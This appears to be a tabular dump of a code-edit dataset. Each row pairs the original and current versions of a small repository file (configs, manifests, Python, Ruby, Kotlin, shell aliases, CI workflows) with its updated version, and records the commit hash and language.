prompt stringlengths 77 6.9k | completion stringlengths 1 3.38k | text stringlengths 163 9.03k | commit stringlengths 40 40 | old_file stringlengths 4 264 | new_file stringlengths 4 264 | lang stringclasses 277
values |
|---|---|---|---|---|---|---|
<|file_sep|>original/tests/config.cfg
[inboxserver]
SERVER_DOMAIN_NAME = dev-localhost.inboxapp.com
API_SERVER_LOC = tcp://0.0.0.0:9999
APP_SERVER_LOC = tcp://0.0.0.0:9998
CRISPIN_SERVER_LOC = tcp://0.0.0.0:9997
BLOCK_SERVER_LOC = tcp://0.0.0.0:9996
SEARCH_SERVER_LOC = tcp://0.0.0.0:9995
... | [inboxserver]
SERVER_DOMAIN_NAME = dev-localhost.inboxapp.com
API_SERVER_LOC = tcp://0.0.0.0:5999
APP_SERVER_LOC = tcp://0.0.0.0:5998
CRISPIN_SERVER_LOC = tcp://0.0.0.0:5997
BLOCK_SERVER_LOC = tcp://0.0.0.0:5996
SEARCH_SERVER_LOC = tcp://0.0.0.0:5995
GOOGLE_CONSUMER_KEY = 786647191490.ap... | <|file_sep|>original/tests/config.cfg
[inboxserver]
SERVER_DOMAIN_NAME = dev-localhost.inboxapp.com
API_SERVER_LOC = tcp://0.0.0.0:9999
APP_SERVER_LOC = tcp://0.0.0.0:9998
CRISPIN_SERVER_LOC = tcp://0.0.0.0:9997
BLOCK_SERVER_LOC = tcp://0.0.0.0:9996
SEARCH_SERVER_LOC = tcp://0.0.0.0:9995
... | 4739f87cee5baabf968700937bab20fe04fac25b | tests/config.cfg | tests/config.cfg | INI |
<|file_sep|>original/_projects/2018/astropy/ccdproc-optimize.md
<|file_sep|>current/_projects/2018/astropy/ccdproc-optimize.md
<|file_sep|>updated/_projects/2018/astropy/ccdproc-optimize.md | ---
name: Optimizing performance of `ccdproc`
desc: The package [ccdproc](https://ccdproc.readthedocs.io) has a stable API but little effort has been put in to optimizing its speed or memory use. The project is to do both optimizations.
# add a short one line description of your project
requirements:
# Student requirem... | <|file_sep|>original/_projects/2018/astropy/ccdproc-optimize.md
<|file_sep|>current/_projects/2018/astropy/ccdproc-optimize.md
<|file_sep|>updated/_projects/2018/astropy/ccdproc-optimize.md
---
name: Optimizing performance of `ccdproc`
desc: The package [ccdproc](https://ccdproc.readthedocs.io) has a stable API but l... | c51d7af18c54fd84020f00a10370f871476616b0 | _projects/2018/astropy/ccdproc-optimize.md | _projects/2018/astropy/ccdproc-optimize.md | Markdown |
<|file_sep|>bower.json.diff
original:
updated:
"ember": "~1.1.2",
<|file_sep|>bower.json.diff
original:
"handlebars": "~1.1.2",
updated:
"handlebars": "~1.0.0",
<|file_sep|>original/bower.json
"dependencies": {
"chai": "~1.8.1",
"jquery": "~2.0.3",
"handlebars": "~1.1.2",
"mocha": "~1.14.... | "dependencies": {
"chai": "~1.8.1",
"ember": "~1.1.2",
"jquery": "~2.0.3",
"handlebars": "~1.0.0",
"mocha": "~1.14.0",
"sinon": "http://sinonjs.org/releases/sinon-1.7.3.js",
"sinon-chai": "~2.4.0"
},
"overrides": {
"handlebars": {
"main": "handlebars.runtime.js"
},
"m... | <|file_sep|>bower.json.diff
original:
updated:
"ember": "~1.1.2",
<|file_sep|>bower.json.diff
original:
"handlebars": "~1.1.2",
updated:
"handlebars": "~1.0.0",
<|file_sep|>original/bower.json
"dependencies": {
"chai": "~1.8.1",
"jquery": "~2.0.3",
"handlebars": "~1.1.2",
"mocha": "~1.14.... | 8ebde16b8dc3f180adea3ab21b57ceafef2de322 | bower.json | bower.json | JSON |
<|file_sep|>original/multiplication-table.py
"""
multiplication-table.py
Author: <your name here>
Credit: <list sources used, if any>
Assignment:
Write and submit a Python program that prints a multiplication table. The user
must be able to determine the width and height of the table before it is printed.
The final ... | """
multiplication-table.py
Author: <your name here>
Credit: <list sources used, if any>
Assignment:
Write and submit a Python program that prints a multiplication table. The user
must be prompted to give the width and height of the table before it is printed.
The final multiplication table should look like this:
W... | <|file_sep|>original/multiplication-table.py
"""
multiplication-table.py
Author: <your name here>
Credit: <list sources used, if any>
Assignment:
Write and submit a Python program that prints a multiplication table. The user
must be able to determine the width and height of the table before it is printed.
The final ... | de40597b406b27c64077dc714b5890f83758d05d | multiplication-table.py | multiplication-table.py | Python |
<|file_sep|>original/.eslintrc.json
{
"extends": "airbnb",
"env": {
"browser": true
},
"rules": {
"import/no-extraneous-dependencies": ["error", {"devDependencies": true}],
"no-param-reassign": ["error", {"props": false}]
}
}
<|file_sep|>current/.eslintrc.json
{
"extends": "airbnb",
"env": {
... | {
"extends": "airbnb",
"env": {
"browser": true
},
"rules": {
"import/no-extraneous-dependencies": ["error", { "devDependencies": true }],
"no-param-reassign": ["error", { "props": false }],
"no-underscore-dangle": ["error", { "allowAfterThis": true, "allowAfterSuper": true }]
}
} | <|file_sep|>original/.eslintrc.json
{
"extends": "airbnb",
"env": {
"browser": true
},
"rules": {
"import/no-extraneous-dependencies": ["error", {"devDependencies": true}],
"no-param-reassign": ["error", {"props": false}]
}
}
<|file_sep|>current/.eslintrc.json
{
"extends": "airbnb",
"env": {
... | 0d9ba98e2b50140b318a9f06feb36adaae3515ba | .eslintrc.json | .eslintrc.json | JSON |
<|file_sep|>utils/jsMinifier/readme.md.diff
original:
node run.js -m=module1,module2,... -d=destinationPath --minifier=minifierName
updated:
node run.js -m module1,module2,... -d destinationPath --minifier=minifierName
<|file_sep|>original/utils/jsMinifier/readme.md
node run.js -m=module1,module2,... -d=destinationPath... | node run.js -m module1,module2,... -d destinationPath --minifier=minifierName
```
where the -d arg appoint the output path and the -m arg limits the modules needed to be outputted.
If this arg is not set, all modules of Kekule.js will be compressed and outputted.
For example, the following command line will compress ... | <|file_sep|>utils/jsMinifier/readme.md.diff
original:
node run.js -m=module1,module2,... -d=destinationPath --minifier=minifierName
updated:
node run.js -m module1,module2,... -d destinationPath --minifier=minifierName
<|file_sep|>original/utils/jsMinifier/readme.md
node run.js -m=module1,module2,... -d=destinationPath... | 49f325dc5855b0fe6214132c951177103051839c | utils/jsMinifier/readme.md | utils/jsMinifier/readme.md | Markdown |
<|file_sep|>original/site-cookbooks/media-server/recipes/transcoder.rb
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed und... | #
# Copyright 2014, Seth Kingry
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writin... | <|file_sep|>original/site-cookbooks/media-server/recipes/transcoder.rb
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed und... | 30071a5a7cabc1885bc8678bf9eb1cd30539e280 | site-cookbooks/media-server/recipes/transcoder.rb | site-cookbooks/media-server/recipes/transcoder.rb | Ruby |
<|file_sep|>original/assembly/src/main/resources/groups.cfg
org.apache.karaf.cellar.node, \
org.apache.karaf.management, \
org.apache.karaf.shell, \
org.ops4j.pax.logging
defau... | org.apache.karaf.cellar.node, \
org.apache.karaf.management, \
org.apache.karaf.shell, \
org.ops4j.pax.logging
default.config.sync = true
default.features.whitelist.inbound = ... | <|file_sep|>original/assembly/src/main/resources/groups.cfg
org.apache.karaf.cellar.node, \
org.apache.karaf.management, \
org.apache.karaf.shell, \
org.ops4j.pax.logging
defau... | ebccfbf51866c9901317da56e6782e622de204ea | assembly/src/main/resources/groups.cfg | assembly/src/main/resources/groups.cfg | INI |
<|file_sep|>original/mamba/cli.py
if runner.has_failed_examples:
sys.exit(1)
def _parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--version', '-v', default=False, action='store_true', help='Display the version.')
parser.add_argument('--slow', '-s', default=0.075, ty... | if runner.has_failed_examples:
sys.exit(1)
def _parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--version', '-v', default=False, action='store_true', help='Display the version.')
parser.add_argument('--slow', '-s', default=0.075, type=float, help='Slow test threshol... | <|file_sep|>original/mamba/cli.py
if runner.has_failed_examples:
sys.exit(1)
def _parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--version', '-v', default=False, action='store_true', help='Display the version.')
parser.add_argument('--slow', '-s', default=0.075, ty... | eda5e7e2bb83f35e18cd0b5402636d4e930e02b9 | mamba/cli.py | mamba/cli.py | Python |
<|file_sep|>original/README.md
About
=====
Jumpcut is a clipboard manager for macOS, providing access to text that
you've cut or copied, even if you've subsequently cut or copied something
else.
Jumpcut has a lightweight, intuitive interface and is 100% focused on
your clipboard, keeping code snippets, email addresse... | About
=====
Jumpcut is a clipboard manager for macOS, providing access to text that
you've cut or copied, even if you've subsequently cut or copied something
else.
Jumpcut has a lightweight, intuitive interface and is 100% focused on
your clipboard, keeping code snippets, email addresses, URLs, and that
sentence that... | <|file_sep|>original/README.md
About
=====
Jumpcut is a clipboard manager for macOS, providing access to text that
you've cut or copied, even if you've subsequently cut or copied something
else.
Jumpcut has a lightweight, intuitive interface and is 100% focused on
your clipboard, keeping code snippets, email addresse... | c31a5886e725debc11efae7d3e32f64670190bf0 | README.md | README.md | Markdown |
<|file_sep|>original/requirements.txt
python-dateutil==2.7.3
django==1.11.13 # pyup: >=1.11,<1.12
django-auth-ldap==1.6.1
django-filter==1.1.0
django-multiselectfield==0.1.8
djangorestframework==3.8.2
djangorestframework-jwt==1.11.0
djangorestframework-jsonapi==2.4.0
psycopg2==2.7.4
pytz==2018.4
pyexcel-webio==0.1.4
py... | python-dateutil==2.7.3
django==1.11.13 # pyup: >=1.11,<1.12
django-auth-ldap==1.6.1
django-filter==1.1.0
django-multiselectfield==0.1.8
djangorestframework==3.8.2
djangorestframework-jwt==1.11.0
djangorestframework-jsonapi==2.4.0
psycopg2==2.7.5
pytz==2018.4
pyexcel-webio==0.1.4
pyexcel-io==0.5.7
django-excel==0.0.10
p... | <|file_sep|>original/requirements.txt
python-dateutil==2.7.3
django==1.11.13 # pyup: >=1.11,<1.12
django-auth-ldap==1.6.1
django-filter==1.1.0
django-multiselectfield==0.1.8
djangorestframework==3.8.2
djangorestframework-jwt==1.11.0
djangorestframework-jsonapi==2.4.0
psycopg2==2.7.4
pytz==2018.4
pyexcel-webio==0.1.4
py... | 7e26616503141d58fe503955594ef10b30fb6cdf | requirements.txt | requirements.txt | Text |
<|file_sep|>original/.verbrc.md
* Banner templates are just Lo-Dash/Underscore templates. Anything that works with those libs will work in banner templates.
* package.json is used for context
* the `options` object can be used to extend the context (package.json) passed to templates
## Install
{%= include("install") %... | * Banner templates are just Lo-Dash/Underscore templates. Anything that works with those libs will work in banner templates.
* package.json is used for context
* the `options` object can be used to extend the context (package.json) passed to templates
## Install
{%= include("install") %}
Specify a file:
```js
banner... | <|file_sep|>original/.verbrc.md
* Banner templates are just Lo-Dash/Underscore templates. Anything that works with those libs will work in banner templates.
* package.json is used for context
* the `options` object can be used to extend the context (package.json) passed to templates
## Install
{%= include("install") %... | 72021b6ea095bdc9dc9d8f711063706ef2c4d0c5 | .verbrc.md | .verbrc.md | Markdown |
<|file_sep|>original/zsh/git-aliases.zsh
alias gl='git log'
alias ga='git add'
alias gr='git rm'
alias gd='git diff'
alias gdc='git diff --cached'
alias gg='git grep --break --heading --line-number'
alias gcm='git commit'
alias gcma='git commit --amend'
alias gpl='git pull --rebase'
alias gps='git push'
alias gpst='git... | alias gl='git log'
alias ga='git add'
alias gr='git rm'
alias gd='git diff'
alias gdc='git diff --cached'
alias gg='git grep --break --heading --line-number'
alias gcm='git commit'
alias gcma='git commit --amend'
alias gpl='git pull --rebase'
alias gps='git push'
alias gpsf='git push --force-with-lease'
alias gpst='git... | <|file_sep|>original/zsh/git-aliases.zsh
alias gl='git log'
alias ga='git add'
alias gr='git rm'
alias gd='git diff'
alias gdc='git diff --cached'
alias gg='git grep --break --heading --line-number'
alias gcm='git commit'
alias gcma='git commit --amend'
alias gpl='git pull --rebase'
alias gps='git push'
alias gpst='git... | dab5567c501df719a0b936bc1bf53878c2fdf26c | zsh/git-aliases.zsh | zsh/git-aliases.zsh | Shell |
<|file_sep|>original/package.json
{
"name": "hubot-excelworship",
"version": "0.0.0",
"private": true,
"author": "Kenneth Powers <ken@kenpowers.net>",
"description": "Bot for ExcelWorship Slack Group",
"license": "MIT",
"scripts": {
"start:shell": "hubot --name hubot",
"start": "npm run start:shel... | {
"name": "hubot-excelworship",
"version": "0.0.0",
"private": true,
"author": "Kenneth Powers <ken@kenpowers.net>",
"description": "Bot for ExcelWorship Slack Group",
"license": "MIT",
"scripts": {
"start:shell": "hubot --name hubot",
"start": "npm run start:shell -- -a slack",
"forever": "fo... | <|file_sep|>original/package.json
{
"name": "hubot-excelworship",
"version": "0.0.0",
"private": true,
"author": "Kenneth Powers <ken@kenpowers.net>",
"description": "Bot for ExcelWorship Slack Group",
"license": "MIT",
"scripts": {
"start:shell": "hubot --name hubot",
"start": "npm run start:shel... | a0eac9fe61ee7ec2cd82944e443041c98a1f269c | package.json | package.json | JSON |
<|file_sep|>original/lib/hal_api/controller/exceptions.rb
<|file_sep|>current/lib/hal_api/controller/exceptions.rb
<|file_sep|>updated/lib/hal_api/controller/exceptions.rb | require 'action_dispatch/http/request'
require 'action_dispatch/middleware/exception_wrapper'
# Since we are taking over exception handling, make sure we log exceptions
# https://github.com/rails/rails/blob/4-2-stable/actionpack/lib/action_dispatch/middleware/debug_exceptions.rb
module HalApi::Controller::Exceptions
... | <|file_sep|>original/lib/hal_api/controller/exceptions.rb
<|file_sep|>current/lib/hal_api/controller/exceptions.rb
<|file_sep|>updated/lib/hal_api/controller/exceptions.rb
require 'action_dispatch/http/request'
require 'action_dispatch/middleware/exception_wrapper'
# Since we are taking over exception handling, make... | 90d45353415c3590005df90ad479142e2d581f18 | lib/hal_api/controller/exceptions.rb | lib/hal_api/controller/exceptions.rb | Ruby |
<|file_sep|>original/src/htmlMapping.spec.js
enableTracing()
})
afterEach(function(){
disableTracing()
})
it("Traces a basic string assignment", function(){
var el = document.createElement("div")
el.innerHTML = "Hello"
// <[d]iv>Hello</div>
expect(getRoo... |
// <[d]iv>Hello</div>
expect(getRootOriginAtChar(el, 1).origin.action).toBe("createElement")
// <div>[H]ello</div>
var originAndChar = getRootOriginAtChar(el, 5);
expect(originAndChar.origin.action).toBe("Assign InnerHTML")
expect(originAndChar.origin.value[originAndCha... | <|file_sep|>original/src/htmlMapping.spec.js
enableTracing()
})
afterEach(function(){
disableTracing()
})
it("Traces a basic string assignment", function(){
var el = document.createElement("div")
el.innerHTML = "Hello"
// <[d]iv>Hello</div>
expect(getRoo... | 1e1f6080d3ae08b71e829d5482a43b6c5e5049e0 | src/htmlMapping.spec.js | src/htmlMapping.spec.js | JavaScript |
<|file_sep|>original/run_as_worker.sh
#!/usr/bin/env bash
# the worker uses its job data input to determine which gearman server to query for status,
# NOT the environment variables here!
gearcmd -name postgres-to-redshift \
-host=$GEARMAN_HOST \
-port=$GEARMAN_PORT \
-parseargs=true \
-cmd /usr/local/bin/post... | #!/usr/bin/env bash
# the worker uses its job data input to determine which gearman server to query for status,
# NOT the environment variables here!
gearcmd -name postgres-to-redshift \
-host=$GEARMAN_HOST \
-port=$GEARMAN_PORT \
-parseargs=true \
-cmd /go/src/github.com/Clever/postgres-to-redshift/run_main.s... | <|file_sep|>original/run_as_worker.sh
#!/usr/bin/env bash
# the worker uses its job data input to determine which gearman server to query for status,
# NOT the environment variables here!
gearcmd -name postgres-to-redshift \
-host=$GEARMAN_HOST \
-port=$GEARMAN_PORT \
-parseargs=true \
-cmd /usr/local/bin/post... | 27b6d43dd56918176c6d4d7ecad6665e75009b60 | run_as_worker.sh | run_as_worker.sh | Shell |
<|file_sep|>src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt.diff
original:
updated:
import com.intellij.psi.PsiArrayType
import com.intellij.psi.PsiEllipsisType
<|file_sep|>src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt.diff
original:
... |
// Check if remaining parameter count is enough
if (currentPosition + size > parameters.size) {
return false
}
var pos = currentPosition
// Check parameter types
for ((_, type) in this.parameters) {
val expectedType = parameters[pos++].type
... | <|file_sep|>src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt.diff
original:
updated:
import com.intellij.psi.PsiArrayType
import com.intellij.psi.PsiEllipsisType
<|file_sep|>src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt.diff
original:
... | 62ddda99ef7ce1482aba4f967b0c496d43b15fff | src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt | src/main/kotlin/com/demonwav/mcdev/platform/mixin/inspection/injector/ParameterGroup.kt | Kotlin |
<|file_sep|>original/app/Resources/views/Chat/_chat_stats.html.twig
{%- if messages is defined -%}{% dump(conversation.seconds) %}
{{ conversation.seconds|date_interval }}
{%- if is_granted('ROLE_MODEL') %}
= ${{ conversation.modelEarnings|number_format(2) }}
{%- endif -%}
{%- endif -%}
<|file_sep|>... | {%- if messages is defined -%}
{{ conversation.seconds|date_interval }}
{%- if is_granted('ROLE_MODEL') %}
= ${{ conversation.modelEarnings|number_format(2) }}
{%- endif -%}
{%- endif -%} | <|file_sep|>original/app/Resources/views/Chat/_chat_stats.html.twig
{%- if messages is defined -%}{% dump(conversation.seconds) %}
{{ conversation.seconds|date_interval }}
{%- if is_granted('ROLE_MODEL') %}
= ${{ conversation.modelEarnings|number_format(2) }}
{%- endif -%}
{%- endif -%}
<|file_sep|>... | 5afa1a01fc2490e77d9c8d417b0d7f17c46d7791 | app/Resources/views/Chat/_chat_stats.html.twig | app/Resources/views/Chat/_chat_stats.html.twig | Twig |
<|file_sep|>original/requirements.txt
molecule==2.14.0
pytest==3.5.1
python-vagrant==0.5.15
testinfra==1.13.0
tox==3.0.0
<|file_sep|>current/requirements.txt
molecule==2.14.0
pytest==3.5.1
python-vagrant==0.5.15
testinfra==1.13.0
tox==3.0.0
<|file_sep|>updated/requirements.txt | molecule==2.14.0
pytest==3.6.0
python-vagrant==0.5.15
testinfra==1.13.0
tox==3.0.0 | <|file_sep|>original/requirements.txt
molecule==2.14.0
pytest==3.5.1
python-vagrant==0.5.15
testinfra==1.13.0
tox==3.0.0
<|file_sep|>current/requirements.txt
molecule==2.14.0
pytest==3.5.1
python-vagrant==0.5.15
testinfra==1.13.0
tox==3.0.0
<|file_sep|>updated/requirements.txt
molecule==2.14.0
pytest==3.6.0
python-vagr... | 225c67cb756fbbacfbc97a3e9116f2d259d17dad | requirements.txt | requirements.txt | Text |
<|file_sep|>original/sandboxed_api/.github/workflows/ubuntu-cmake.yml
<|file_sep|>current/sandboxed_api/.github/workflows/ubuntu-cmake.yml
<|file_sep|>updated/sandboxed_api/.github/workflows/ubuntu-cmake.yml | name: CMake
on: [push, pull_request]
env:
BUILD_TYPE: Release
jobs:
build:
runs-on: ${{ matrix.os }}
strategy:
matrix:
os: [ubuntu-20.04, ubuntu-18.04]
steps:
- uses: actions/checkout@v2
- name: Install ninja-build tool
uses: seanmiddleditch/gha-setup-ninja@v3
- nam... | <|file_sep|>original/sandboxed_api/.github/workflows/ubuntu-cmake.yml
<|file_sep|>current/sandboxed_api/.github/workflows/ubuntu-cmake.yml
<|file_sep|>updated/sandboxed_api/.github/workflows/ubuntu-cmake.yml
name: CMake
on: [push, pull_request]
env:
BUILD_TYPE: Release
jobs:
build:
runs-on: ${{ matrix.os }... | a2fa2690804ee4c6689a6aead5cf196b1002de55 | sandboxed_api/.github/workflows/ubuntu-cmake.yml | sandboxed_api/.github/workflows/ubuntu-cmake.yml | YAML |
<|file_sep|>original/.travis.yml
- "3.8"
services: mongodb
# Install test dependencies
before_install:
- python --version
- pip install pytest pytest-cov
- pip install codecov
# Install project depencies
install:
- pip install -r requirements.txt --quiet
# Run automated tests
script:
- pytest --cov flas... | - pip install codecov
# Install project depencies
install:
- pip install -r requirements.txt --quiet
# Run automated tests
script:
- pytest --cov flask_user --cov-report term-missing --cov-config flask_user/tests/.coveragerc flask_user/tests
# Submit coverage report to coveralls
after_success:
- codecov
# U... | <|file_sep|>original/.travis.yml
- "3.8"
services: mongodb
# Install test dependencies
before_install:
- python --version
- pip install pytest pytest-cov
- pip install codecov
# Install project depencies
install:
- pip install -r requirements.txt --quiet
# Run automated tests
script:
- pytest --cov flas... | 27e3664eb18638a64e43e18afe886a9c49941d73 | .travis.yml | .travis.yml | YAML |
<|file_sep|>original/README.md
[](https://travis-ci.org/zmb3/godoc)
An [Atom](https://atom.io) package for the Go language that shows documentation
for identifiers in source code.
](https://ci.appveyor.com/project/zmb3/godoc)
[](https://travis-ci.org/zmb3/godoc)
An [Atom](https://atom.io) package for the Go language that shows documentation
fo... | <|file_sep|>original/README.md
[](https://travis-ci.org/zmb3/godoc)
An [Atom](https://atom.io) package for the Go language that shows documentation
for identifiers in source code.
:
'''
Print an entity or entities object in Flexbe runtime. Should be only used for debug.
># entity Entity The entity or entities array follow... | <|file_sep|>original/sara_flexbe_states/src/sara_flexbe_states/LogEntity.py
<|file_sep|>current/sara_flexbe_states/src/sara_flexbe_states/LogEntity.py
<|file_sep|>updated/sara_flexbe_states/src/sara_flexbe_states/LogEntity.py
#!/usr/bin/env python
# encoding=utf8
from flexbe_core import EventState, Logger
from sara_... | 61a7dad7c47b25907246524a28252c6e8004a74f | sara_flexbe_states/src/sara_flexbe_states/LogEntity.py | sara_flexbe_states/src/sara_flexbe_states/LogEntity.py | Python |
<|file_sep|>original/tests/ssh_parameters_test.py
#!/usr/bin/env python
# -*- coding: utf8 -*-
from app.protocols import ssh
def ssh_parameters_test():
ss = ssh(hostname = '127.0.0.1', port = 22, username='user', password='password')
assert(ss.hostname and ss.port, ss.username and ss.password)
<|file_sep|>cur... | #!/usr/bin/env python
# -*- coding: utf8 -*-
from app.protocols import ssh
def ssh_parameters_test():
ss = ssh(hostname = '127.0.0.1', port = 22, username='user', password='password')
assert(ss.hostname and ss.port and ss.username and ss.password) | <|file_sep|>original/tests/ssh_parameters_test.py
#!/usr/bin/env python
# -*- coding: utf8 -*-
from app.protocols import ssh
def ssh_parameters_test():
ss = ssh(hostname = '127.0.0.1', port = 22, username='user', password='password')
assert(ss.hostname and ss.port, ss.username and ss.password)
<|file_sep|>cur... | 1f16d194ba78ec8ef50959dc37833ed8d5348c38 | tests/ssh_parameters_test.py | tests/ssh_parameters_test.py | Python |
<|file_sep|>src/test/groovy/AmbiguousInvocationTest.groovy.diff
original:
dummy = new DummyMethods()
updated:
// @todo as DummyMethods.java not being compiled prior to test run in maven build
// dummy = new DummyMethods()
<|file_sep|>src/test/groovy/AmbiguousInvocationTest.groovy.diff
original:
assert ... | class AmbiguousInvocationTest extends GroovyTestCase {
// to prove GROOVY-467 is no longer an issue
property mock
void setUp() {
// @todo as DummyMethods.java not being compiled prior to test run in maven build
// dummy = new DummyMethods()
}
void testAmbiguousInvocationWithFl... | <|file_sep|>src/test/groovy/AmbiguousInvocationTest.groovy.diff
original:
dummy = new DummyMethods()
updated:
// @todo as DummyMethods.java not being compiled prior to test run in maven build
// dummy = new DummyMethods()
<|file_sep|>src/test/groovy/AmbiguousInvocationTest.groovy.diff
original:
assert ... | a5cf333a226aa4b370fcecc8ab1791e93025b185 | src/test/groovy/AmbiguousInvocationTest.groovy | src/test/groovy/AmbiguousInvocationTest.groovy | Groovy |
<|file_sep|>src/assets/scss/modules/_box.scss.diff
original:
updated:
border-top: 1px transparent solid;
<|file_sep|>original/src/assets/scss/modules/_box.scss
font-size: 14px;
line-height: 1.4;
margin: 0;
padding: 8px 12px;
}
#poststuff .papi-box {
.inside {
margin-right: -13px !important;
padd... | font-size: 14px;
line-height: 1.4;
margin: 0;
padding: 8px 12px;
}
#poststuff .papi-box {
.inside {
border-top: 1px transparent solid;
margin-right: -13px !important;
margin-top: 5px;
padding-right: 0;
> .papi-table {
margin: -7px -12px -12px;
}
}
}
#side-sortables { | <|file_sep|>src/assets/scss/modules/_box.scss.diff
original:
updated:
border-top: 1px transparent solid;
<|file_sep|>original/src/assets/scss/modules/_box.scss
font-size: 14px;
line-height: 1.4;
margin: 0;
padding: 8px 12px;
}
#poststuff .papi-box {
.inside {
margin-right: -13px !important;
padd... | 7731f94424cf3944af120f9124f7d160b523c30f | src/assets/scss/modules/_box.scss | src/assets/scss/modules/_box.scss | SCSS |
<|file_sep|>src/net/instaweb/automatic/system_tests/image_quality_webp.sh.diff
original:
check run_wget_with_args \
--header 'X-PSA-Blocking-Rewrite: psatest' --user-agent=webp $URL
updated:
fetch_until -save -recursive $URL \
'fgrep -c 256x192xPuzzle.jpg.pagespeed.ic' 1 \
--user-agent=webp
<|file_sep|>src/net/i... | start_test quality of webp output images
rm -rf $OUTDIR
mkdir $OUTDIR
IMG_REWRITE="$TEST_ROOT/webp_rewriting/rewrite_images.html"
REWRITE_URL="$IMG_REWRITE?PageSpeedFilters=rewrite_images"
URL="$REWRITE_URL,convert_jpeg_to_webp&$IMAGES_QUALITY=75&$WEBP_QUALITY=65"
fetch_until -save -recursive $URL \
'fgrep -c 256x192... | <|file_sep|>src/net/instaweb/automatic/system_tests/image_quality_webp.sh.diff
original:
check run_wget_with_args \
--header 'X-PSA-Blocking-Rewrite: psatest' --user-agent=webp $URL
updated:
fetch_until -save -recursive $URL \
'fgrep -c 256x192xPuzzle.jpg.pagespeed.ic' 1 \
--user-agent=webp
<|file_sep|>src/net/i... | 0023ea3487a1090619b98c392cbaa5aedf141fc0 | src/net/instaweb/automatic/system_tests/image_quality_webp.sh | src/net/instaweb/automatic/system_tests/image_quality_webp.sh | Shell |
<|file_sep|>original/modules/openid/www/consumer.php
}
$authState = $_REQUEST['AuthState'];
$state = SimpleSAML_Auth_State::loadState($authState, 'openid:init');
$sourceId = $state['openid:AuthId'];
$authSource = SimpleSAML_Auth_Source::getById($sourceId);
if ($authSource === NULL) {
throw new SimpleSAML_Error_BadReq... | }
$authState = $_REQUEST['AuthState'];
$state = SimpleSAML_Auth_State::loadState($authState, 'openid:init');
$sourceId = $state['openid:AuthId'];
$authSource = SimpleSAML_Auth_Source::getById($sourceId);
if ($authSource === NULL) {
throw new SimpleSAML_Error_BadRequest('Invalid AuthId \'' . $sourceId . '\' - not foun... | <|file_sep|>original/modules/openid/www/consumer.php
}
$authState = $_REQUEST['AuthState'];
$state = SimpleSAML_Auth_State::loadState($authState, 'openid:init');
$sourceId = $state['openid:AuthId'];
$authSource = SimpleSAML_Auth_Source::getById($sourceId);
if ($authSource === NULL) {
throw new SimpleSAML_Error_BadReq... | 17a53a70add3a2ca648b4e64e22c6580dd33f959 | modules/openid/www/consumer.php | modules/openid/www/consumer.php | PHP |
<|file_sep|>original/requirements_migrations.txt
# Those dependencies are needed for the test_migrations.sh script
PyMySQL==0.9.2
psycopg2==2.7.6.1
<|file_sep|>current/requirements_migrations.txt
# Those dependencies are needed for the test_migrations.sh script
PyMySQL==0.9.2
psycopg2==2.7.6.1
<|file_sep|>updated/requi... | # Those dependencies are needed for the test_migrations.sh script
PyMySQL==0.9.3
psycopg2==2.7.6.1 | <|file_sep|>original/requirements_migrations.txt
# Those dependencies are needed for the test_migrations.sh script
PyMySQL==0.9.2
psycopg2==2.7.6.1
<|file_sep|>current/requirements_migrations.txt
# Those dependencies are needed for the test_migrations.sh script
PyMySQL==0.9.2
psycopg2==2.7.6.1
<|file_sep|>updated/requi... | fd2a8e8273fdee22fd82e594468cfca10a555967 | requirements_migrations.txt | requirements_migrations.txt | Text |
<|file_sep|>original/src/leaves/cli/leaf.js
input: process.stdin,
output: process.stdout,
terminal: false
})
export default class Cli extends EventEmitter {
init () {
this.get()
}
get () {
rl.question('> ', message => {
this.emit('message', message)
})
}
send ({ text }) {
l.ok(text)
this.get()
... |
export default class Cli extends EventEmitter {
init () {
this.get()
}
get () {
rl.question('> ', message => {
this.emit('message', message)
})
}
send ({ text, level }) {
if (!l[level]) {
l.ok(text)
} else {
l[level](text)
}
this.get()
}
} | <|file_sep|>original/src/leaves/cli/leaf.js
input: process.stdin,
output: process.stdout,
terminal: false
})
export default class Cli extends EventEmitter {
init () {
this.get()
}
get () {
rl.question('> ', message => {
this.emit('message', message)
})
}
send ({ text }) {
l.ok(text)
this.get()
... | 490dc756ddda168c678713da29053ac090eabec1 | src/leaves/cli/leaf.js | src/leaves/cli/leaf.js | JavaScript |
<|file_sep|>original/package.json
{
"name": "docker-node.js",
"version": "1.0.0",
"description": "docker koa2 redis mysql mongodb Integrated development environment",
"main": "app.js",
"repository": {
"url": "git@github.com:huangyanxiong01/docker-node.js.git",
"type": "git"
},
"author": "Freax <Fr... | {
"name": "docker-node.js",
"version": "1.0.0",
"description": "docker koa2 redis mysql mongodb Integrated development environment",
"main": "app.js",
"repository": {
"url": "git@github.com:huangyanxiong01/docker-node.js.git",
"type": "git"
},
"author": "Freax <Freax>",
"license": "MIT",
"depe... | <|file_sep|>original/package.json
{
"name": "docker-node.js",
"version": "1.0.0",
"description": "docker koa2 redis mysql mongodb Integrated development environment",
"main": "app.js",
"repository": {
"url": "git@github.com:huangyanxiong01/docker-node.js.git",
"type": "git"
},
"author": "Freax <Fr... | 6daf483bfdeb9613dd481d9a85f7362575839fa2 | package.json | package.json | JSON |
<|file_sep|>lib/bx_wiki_macros.rb.diff
original:
updated:
desc "Links to resource page.\n_Example:_\n\n {{bx_resource(3)}}"
<|file_sep|>original/lib/bx_wiki_macros.rb
resource = BxResourceNode.where(:id => resource_id).first
if resource
link_label = resource.code
link_label << " : #{resource.sum... | resource_id = args.first
resource = BxResourceNode.where(:id => resource_id).first
if resource
